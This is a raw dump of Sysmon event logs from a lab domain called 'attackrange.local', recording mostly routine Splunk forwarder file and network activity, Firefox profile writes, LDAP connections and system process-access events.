Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5E841A962A9B1D093C363411EA414B36,SHA256=20E43D70DD55A332099739903C108BB306398CEC2C46FCA439EA07704C0E342C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:12.961{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7B225C111D66A7AF423FF3B222EA72E,SHA256=11C1BB706F1762BD5673AC4F3EF862FCC2AFE238BAEA6A6C7380392ED795E95B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810431Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:12.762{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=280D3C9AAB8C5534B837DE7CB1D200F6,SHA256=5AC07006472EBC33D1ED9D73E56D3FE71FF0036731DD23813404B30FAF0B597B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810432Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:13.778{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54BAB21887EAC651378991AC241B23FD,SHA256=4568D61E385F1658608CE03FDD17CD3B4155CF2AF2114AED779952B4407B7EE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810433Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:14.780{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEDFC46391B765F3429CDAB9A367E760,SHA256=9B58500F3E1D82A05267F368FD4ED1F1254C0818247A421815583EC7F5341479,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:14.008{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1A1BD2F901B4CA94B94CCCBE517078A,SHA256=199A390388E5CE1E3B9E73C41AC347A8ED5BC34ACF674F5A3BA3179D0B6977B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810435Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:15.780{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72AFA1E5906329FA1D9C798668E3BAF2,SHA256=A34CC47D9167065DB3D270EE7FA836DD9AF8AC87646A9E83EC24452992E2E2AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:15.576{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=443455A1FE8714A8B6E8B566F65C919C,SHA256=8ADBEAD7C097D14CF9F87772FA020E2DC44E3097B49B532AE4D06EC85BA04951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:15.576{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=671AE2AF88BD1FAF16F595ACFB35F7A0,SHA256=636BFD0493C5E615A3E333FB85E9C9901EF4E35A9F699FB8A77E59342D24755C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:15.023{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B0177E2B22767903F50D67A874E451B,SHA256=161D2F32FC7355D719611485990DCF5ECCE4BA43BE782596D0A8BA8BEF89C3BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810434Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:14.208{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57468-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810436Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:16.796{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7954EDC1180096C5B23F4EA221AA1129,SHA256=366A789660A39FEF5AC6A91EE7849EC2C32CE609983BBFEF0E369CBDB136FA13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.376{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F8F01CB05FAC7EB21960C49D4ED96B14,SHA256=ED5DF98769207B192001301A0E1D753485D16AB5232AFA29815DE0333D2CB7DC,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.376{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4B54CF66D742CB324562327050DFB14D,SHA256=64616534477144A504BB02691FBA574DCFB2F58B1EC2222CFCFAA65CAB708B41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=09BFC1C9577B3757E301ABC1C0630D64,SHA256=1D4E61E0D803E20025F2831B9415F87F416C9341B4DF5DB2907BBF609E09A071,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=02E0B2B9B25107FC4E46148B68D3D938,SHA256=13D52CA4460C3B0670105A16E750BC4E70BD5B645528593B3A925BF075AC48E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5E2A1A0D0FF186577D4EA400B12AE82A,SHA256=87F6254E8649626E2FE9BEC29A15AC5BBF07096803BB1E7B282F17B7B96EEBF5,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=78ECFA3C82246EEB4A8402EFD642CC95,SHA256=C4B03E6F4B2E5AC653C4FBC1212BEF7B4F23713B0CA6C5A9B53D7F0BAAB50D9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B0854B1DE6B008DC7F67D0E4BAE5E058,SHA256=B3B01F83BE02BAAE00D43FA9F87AFEE59A7FFADAB1D96F53533C7425521F7722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C5AC7B843A47AFB4599AA76F5FBBEDCF,SHA256=7203224979923F4779609AF108B55B901F4140C270A2536BDC0279706463CF0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7198EDEDD5ED0F42C41F54712EE0ED3D,SHA256=23EBD624B4E351A343993BF56D695C42B932CE591175053DA0BC66F32EF13339,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8668268109A0E4C5B689CA70F555D145,SHA256=5FA6879A6B7370CED4C6C09D45349BA9C74613C7611472DE110CEF85B8BA47A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=35160FBAB44DB0FDA6AB88B86E548F2F,SHA256=A29056E2AEFE556AA3233D5397077DD35D5B12F3888D79DE9DC0CD79CFE81409,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:08.102{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61976-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001054906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:08.102{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61976-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001054905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:07.568{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61975-false10.0.1.12-8000- 23542300x80000000000000001054904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.023{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF950364EA15D6AC323C9A3D224AE832,SHA256=5758489E8C36A8ECA2493446390EDE6C974D35B3595CD310616982F2B9CA106C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810437Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:17.827{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67C598222998989C42E1BA0A3AF67D5A,SHA256=DD17192769CAAA68EA85F7BDAE3BAE76D8E133E07C96197ADB07E3408B0A8AC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:17.023{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EC3629224B262C893D815BEF41D337F,SHA256=CE36E42210F4C68DACE595000F26181AF6F99A8FF4AAD6CDE6E933C5BCF0195A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810438Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:18.890{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B508D604BD4FB68F4D093A6D085BF1D0,SHA256=A7664AC1DAC2A27123814567B5B47C457242D6BB911CA7970C3B31AE271F6114,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:18.574{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:18.040{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26127288895E3C01ECFA5A04D949D818,SHA256=1E9014A1EA36E0DB8BF38EEC868435453AF74BD9D87F470CD3FB89BB43517902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810439Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:19.905{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8776E8075B344F2EADDD0340C96B17CE,SHA256=0CD4C895134D147AE423C1F9970370500392CEE1EFD939543FCD70925C69B49C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:19.058{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F62D20E7DF090547E1FE482200FD234,SHA256=D7FFD4DE12FD0E07FF854D83C9129F6AA8C69341CE939098815950B7808445EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810442Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:20.905{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E888EB65EFB4D04B64D84242826CDE0,SHA256=2B07165EE8148698457B38FA811A56C1EBE91F94C790F29FAFED94216D540BE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:20.073{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B02CB10FA2218ED7027A93606E783E2E,SHA256=1C5A807CCBD146604090082A9C98B100108F70304E4D0360521783EA2A9CFFDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810441Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:20.874{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810440Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:19.289{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57469-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810443Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:21.921{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A66F15354B3F307E49DB380B379168C1,SHA256=46D87CC9A238B27F782C681B057518B1924CC153A4D13158A3423761D5DCC3BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:12.707{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61977-false10.0.1.12-8000- 23542300x80000000000000001054924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:21.073{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=643EEECF5189910F69E08B129CD3959C,SHA256=DB2038D0889EFB19ADD15FB69236FFA714940255FFA33FD21476DCA0564675AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810445Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:22.968{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EFC302E3A746C63E3547E298AB827AD,SHA256=2D9CF49546E9532ED394C9EA69940D4A40D386115751492E283AC684E6D3541E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:22.090{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D4AD6F9DA5CDD7B178AFDB28FEC58DD,SHA256=5BE1E4BB476F1D885E5E04B3598EE2D29168E0F5C2244B18A1834CCCC5C6FF72,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810444Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:21.008{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57470-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001054927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:23.091{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D24D07E655C8A7442FBF10791360CB44,SHA256=A916618F10CD53E8B6CB658906A2C646B530862DE877DF39955106ECAB11717B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:24.122{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E512E8FAAE9B3BEA489E0A3FC8D63A24,SHA256=C57E7D9C4A217F5159CB6A2908083BC3DF71E663F7865D43438A28A1F1A747DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810473Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F878-60EB-E479-00000000D001}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810472Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810471Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810470Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 